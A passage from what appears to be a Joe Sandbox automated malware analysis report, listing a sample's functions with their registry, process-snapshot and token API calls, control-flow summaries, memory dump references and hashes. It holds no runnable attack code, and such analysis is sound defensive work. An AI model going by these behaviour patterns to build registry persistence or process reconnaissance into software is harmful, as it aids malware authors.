                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 00976298
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocCloseOpenQueryValueVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1821833669-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9b49e9f60a9ec9610da77b54217cf26d6b6ac94f0bae5f2632ec3b90213a48c1
                                                                                                                                                                                                                                                                                            • Instruction ID: a4186bcf22a410cd82694ba9ce935f97f7c0a4fc103200f6d13c418f143d9bca
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b49e9f60a9ec9610da77b54217cf26d6b6ac94f0bae5f2632ec3b90213a48c1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32110673804354BBEF15ABA4CC02FEE7B789F81320F00404DFA547A1D1DAB16A40C795
                                                                                                                                                                                                                                                                                            Function 00976335 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(?,?,00000000,00020006,?,00000000,?,?,00975FDB,?,?,?), ref: 0097635A
                                                                                                                                                                                                                                                                                            • RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,00975FDB,?,?,?), ref: 009763B2
                                                                                                                                                                                                                                                                                              • Part of subcall function 009760EC: RegSetValueExW.KERNEL32(?,?,00000000,00000001,00000000,00976086,?,00976086,00000000,?,?,00000000), ref: 0097610D
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(?,?,?,00975FDB,?,?,?), ref: 0097638A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCreateOpenValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776291540-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e3550ae643fd1e613060dac188b79bad373e7de9ca31b7b50b9d14ad0f125583
                                                                                                                                                                                                                                                                                            • Instruction ID: 6a1b19f592c8c784f6a068be9b70a110c034d6cb113f4917991c4607ff6506d1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3550ae643fd1e613060dac188b79bad373e7de9ca31b7b50b9d14ad0f125583
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E017173504224BAEF196BA1DC07EEF3F5DDF913A0F108054BA1E55091E9719F00E6A0
                                                                                                                                                                                                                                                                                            Function 00975FA8 Relevance: 3.1, APIs: 2, Instructions: 101registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009761F3: RegOpenKeyExW.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 00976229
                                                                                                                                                                                                                                                                                              • Part of subcall function 009761F3: RegQueryValueExW.KERNEL32(?,00000001,00000000,00000001,00000000,?,00000000), ref: 0097625A
                                                                                                                                                                                                                                                                                              • Part of subcall function 009761F3: RegCloseKey.KERNEL32(?), ref: 00976298
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(?,?,00000000,000F003F,?), ref: 00976001
                                                                                                                                                                                                                                                                                              • Part of subcall function 00976335: RegOpenKeyExW.KERNEL32(?,?,00000000,00020006,?,00000000,?,?,00975FDB,?,?,?), ref: 0097635A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00976335: RegCloseKey.KERNEL32(?,?,?,00975FDB,?,?,?), ref: 0097638A
                                                                                                                                                                                                                                                                                            • RegNotifyChangeKeyValue.KERNEL32(?,00000001,0000000F,?,00000001), ref: 00976053
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Open$CloseValue$ChangeNotifyQuery
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3054485492-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a0d11b187f2e0df7e41f3ec3faafbbf26b0afc1ed671d5e179d0fb116ad6cfad
                                                                                                                                                                                                                                                                                            • Instruction ID: e2bfb72e0f810988b42f55fd2bfc282c795513e12bef993275378a1e71fa676f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0d11b187f2e0df7e41f3ec3faafbbf26b0afc1ed671d5e179d0fb116ad6cfad
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A219473404118BFEF156FA5DC47EAF3F29EF85360F104059FA19250A1EA72AE50E6A0
                                                                                                                                                                                                                                                                                            Function 009762A1 Relevance: 3.1, APIs: 2, Instructions: 66registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNEL32(?,00000104,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 009762D9
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(850FC084), ref: 0097632B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00975307: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,009760A1,00000104), ref: 00975324
                                                                                                                                                                                                                                                                                              • Part of subcall function 0097538C: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00971DBA,00000000), ref: 009753AD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Virtual$AllocCloseFreeQueryValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3311923045-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b0e76e7af24c6c17faed32597d56dc337181de0f7e1d7d4d7b3894af5302762d
                                                                                                                                                                                                                                                                                            • Instruction ID: b28a7c2dad059da72d27cf74cc57c0c981964bae9999b12d766ff01969ac1582
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0e76e7af24c6c17faed32597d56dc337181de0f7e1d7d4d7b3894af5302762d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 211100B6D00108BFDB059FE5DC82E9EBBB8EF84394F204055F61996150EA719E50DB50
                                                                                                                                                                                                                                                                                            Function 00975870 Relevance: 3.0, APIs: 2, Instructions: 49processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 189 975870-975895 call 97157d CreateToolhelp32Snapshot 192 975897-975899 189->192 193 97589b-9758aa 189->193 194 9758e7-9758ea 192->194 195 9758c3-9758d8 call 97157d Process32FirstW 193->195 198 9758ac-9758bc call 971e8c 195->198 199 9758da 195->199 205 9758be 198->205 206 9758dc 198->206 200 9758de-9758df call 972371 199->200 204 9758e4-9758e5 200->204 204->194 205->195 206->200
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,2FA62CA8,00000001), ref: 0097588E
                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 009758D4
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2353314856-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3574a0b4891636e80e7d3548bc6747625b2bbfd579194c59834c9daeb723935a
                                                                                                                                                                                                                                                                                            • Instruction ID: 4d59908ba7e8a9b28339c0fabec4a2fa0e8abbd57be2cf1f5787a173ac1e374e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3574a0b4891636e80e7d3548bc6747625b2bbfd579194c59834c9daeb723935a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7F028235047143FD75476B4BC4BFEE378C8B45764F308256F52DA61C2E9A49DC05AA2
                                                                                                                                                                                                                                                                                            Function 009758EB Relevance: 3.0, APIs: 2, Instructions: 49processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 207 9758eb-975912 call 97157d CreateToolhelp32Snapshot 210 975914-975916 207->210 211 975918-975927 207->211 212 975964-975967 210->212 213 975940-975955 call 97157d Module32FirstW 211->213 216 975957 213->216 217 975929-975939 call 971e8c 213->217 218 97595b-97595c call 972371 216->218 222 97593b 217->222 223 975959 217->223 224 975961-975962 218->224 222->213 223->218 224->212
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000018,?,00000000,00000001), ref: 0097590B
                                                                                                                                                                                                                                                                                            • Module32FirstW.KERNEL32(00000000,?), ref: 00975951
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 357197d89d52abd3f29020b04f55bfe24ce485d8ba99c4db5683c468fd36aba3
                                                                                                                                                                                                                                                                                            • Instruction ID: daa9f19dcca36d08bf6a5c38f1d47ff2df1520fe11ebc8f446cbefd87e85b525
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 357197d89d52abd3f29020b04f55bfe24ce485d8ba99c4db5683c468fd36aba3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5F07D73601524BAEB8466746C87FDE3388CB45330FA0C54AF76DAB0C0EDA49EC485B9
                                                                                                                                                                                                                                                                                            Function 009757F2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 225 9757f2-97582d call 97157d * 2 232 97582f-975852 call 97157d GetTokenInformation 225->232 233 97585a-97585e 225->233 232->233 240 975854-975857 232->240 235 975860-975863 call 972371 233->235 236 975869-97586f 233->236 239 975868 235->239 239->236 240->233
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000014,?,00000004,?), ref: 0097584E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InformationToken
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4114910276-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d8a4bbbb5f8426e0d5f995984f0fc0db44f0f6428f5c82ae09fc5190f37a0e84
                                                                                                                                                                                                                                                                                            • Instruction ID: 494554889a7a46a6ea64acfafdbf2846fdace1247cd300974737f348e0f80c10
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8a4bbbb5f8426e0d5f995984f0fc0db44f0f6428f5c82ae09fc5190f37a0e84
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6019273900205BFDB18ABA49C43EEE777CDF80720F20816EF225660D1EDB0AB45D660
                                                                                                                                                                                                                                                                                            Function 00971000 Relevance: 1.6, APIs: 1, Instructions: 53registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 241 971000-97103a call 9729e2 call 972bd5 call 97157d RegOpenKeyExW 248 971040-971044 call 9762a1 241->248 249 97103c-97103e 241->249 252 971049-97104a 248->252 250 97104c-971055 call 976402 249->250 255 971057-971061 call 971f03 250->255 256 971065-971080 call 97538c * 3 250->256 252->250 255->256 261 971063 255->261 261->256
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,00000000,00000000,00020019,00971318,?,?,?,?,?,00971318), ref: 00971036
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3630a4357397e900909c082e122381b7b67141189cd201311aa313e504ddd299
                                                                                                                                                                                                                                                                                            • Instruction ID: fb5b4d96d3a5f46a10e5bdb0ca93ab7c4ad5b14312f386e52396c5e4187a2ea1
